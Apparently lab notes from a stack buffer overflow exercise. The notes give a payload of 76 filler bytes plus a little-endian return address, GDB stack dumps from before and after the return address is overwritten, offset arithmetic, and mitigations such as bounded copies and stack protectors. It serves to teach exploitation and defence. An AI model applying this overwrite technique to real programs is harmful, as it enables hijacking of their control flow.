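Registers address:
ebp 0xbffff4a8 0xbffff4a8
esp 0xbffff450 0xbffff450
ebp-esp=0x58

Buffer address: 0xbffff460

PAYLOAD:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x1C\x85\x04\x08

BEFORE PAYLOAD INJECT:
(gdb) x/40x $esp
0xbffff450: 0x080486af 0x00000001 0x00000000 0x00000001
0xbffff460:*0xb7fff908 0xbffff496 0xbffff4a0 0xb7ee2290[buffer beginning]
0xbffff470: 0xbffff496 0xb7e8f5f5 0xbffff497 0x00000001
0xbffff480: 0x00000000 0xbffff520 0xb7fbfce0 0x08048380
0xbffff490: 0xb7ff0590 0x080498b8 0xbffff4c8* 0x0804864b[buffer end]
0xbffff4a0: 0x00000001 0xbffff574 0xbffff4c8 [0x080485bc][Return Address]
0xbffff4b0: 0xb7e8f7f5 0xb7ff0590 0x0804860b 0xb7fbeff4
0xbffff4c0: 0x08048600 0x00000000 0xbffff548 0xb7e76e46
0xbffff4d0: 0x00000001 0xbffff574 0xbffff57c 0xb7fe0860
0xbffff4e0: 0xb7ff6821 0xffffffff 0xb7ffeff4 0x080482d9

AFTER PAYLOAD INJECT:
(gdb) x/60x 0xbffff450
0xbffff450: 0xbffff460 0x00000001 0x00000000 0x00000001
0xbffff460: *0x41414141 0x41414141 0x41414141 0x41414141[buffer beginning]
0xbffff470: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff480: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff490: 0x41414141 0x41414141 0x41414141* 0x41414141[buffer end]
0xbffff4a0: 0x41414141 0x41414141 0x41414141 [0x0804851c][Return Address]
0xbffff4b0: 0xb7e8f700 0xb7ff0590 0x0804860b 0xb7fbeff4
0xbffff4c0: 0x08048600 0x00000000 0xbffff548 0xb7e76e46
0xbffff4d0: 0x00000001 0xbffff574 0xbffff57c 0xb7fe0860
0xbffff4e0: 0xb7ff6821 0xffffffff 0xb7ffeff4 0x080482d9

NOTES:
The return address slot is at ebp+4 = 0xbffff4ac, and 0xbffff4ac - 0xbffff460 = 0x4c (76) bytes, which is the run of 0x41 seen in the second dump. The last four payload bytes are stored little-endian, so \x1C\x85\x04\x08 reads back as 0x0804851c in place of the original 0x080485bc.
The saved ebp at 0xbffff4a8 (0xbffff4c8 before) is overwritten with 0x41414141 on the way. The word at 0xbffff4b0 changes from 0xb7e8f7f5 to 0xb7e8f700, which is consistent with the copy writing a terminating NUL one byte past the payload.
The first word at esp changes from 0x080486af to 0xbffff460, presumably the buffer pointer passed as an argument to the copy.
Nothing bounds the write to the buffer. A length-checked copy removes the overflow, and a stack-protector build (-fstack-protector) would flag the overwritten frame at function return. 0x0804851c is a fixed text address, so it would only move in a PIE build with ASLR enabled.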